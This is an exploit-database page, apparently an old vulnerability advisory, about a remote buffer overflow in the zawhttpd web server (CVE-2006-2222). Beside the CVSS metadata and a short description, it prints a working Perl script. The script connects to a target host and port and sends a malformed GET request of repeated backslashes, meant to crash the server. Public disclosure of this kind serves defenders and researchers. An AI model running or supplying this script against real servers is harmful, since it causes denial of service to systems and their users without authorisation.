Exploit: zawhttpd - Buffer Overflow ( Ascii Version )

Search:
WLB2

zawhttpd - Buffer Overflow

Published
Credit
Risk
2006.05.09
Kamil Sienicki (K3 spelunca int pl)
High
CWE
CVE
Local
Remote
N/A
CVE-2006-2222
No
Yes

Plain text version

CVSS Base Score
Impact Subscore
Exploitability Subscore
5/10
2.9/10
10/10
Exploit range
Attack complexity
Authentication
Remote
Low
No required
Confidentiality impact
Integrity impact
Availability impact
None
None
Partial

Name: zawhttpd
Version: 0.8.23 previous version probably too.
Language: C
Problem: Buffer Overflow
Vendor: http://www.norz.org/zawhttpd.html
Discovered by: Kamil 'K3' Sienicki

Description:
zawhttpd is a mini Web server that features HTTP/1.0 and 1.1 support,
keep-alive persistent connections, IPv6 support, GET and HEAD requests,
chunked encoding and content-range, directory listing, basic
authentication,
access logging, daemon mode, and more.

Problem:
A remote user can supply a specially crafted data which crash server.

Exploit:
#!/usr/bin/perl
# zawhttpd Buffer Overflow Exploit
# by Kamil 'K3' Sienicki

use IO::Socket;
use strict;

my($socket) = "";

if($socket = IO::Socket::INET->new(
PeerAddr => $ARGV[0],
PeerPort => $ARGV[1],
Proto => "TCP"))
{
print "Attempting to kill zawhttpd at $ARGV[0]:$ARGV[1] ...";
print $socket "GET \\\\\\\\\\ HTTP/1.0rnrn";
close($socket);
}
else
{
print "perl zawhttpd.pl localhost 80 n";
print "Cannot connect to $ARGV[0]:$ARGV[1]n";
}

--
Kamil 'K3' Sienicki

See this note in TXT Version

Bugtraq RSS
Bugtraq
 
REDDIT
REDDIT
 
DIGG
DIGG
 
LinkedIn
LinkedIn
 
CVE RSS
CVEMAP

Copyright 2014, cxsecurity.com
Ascii Version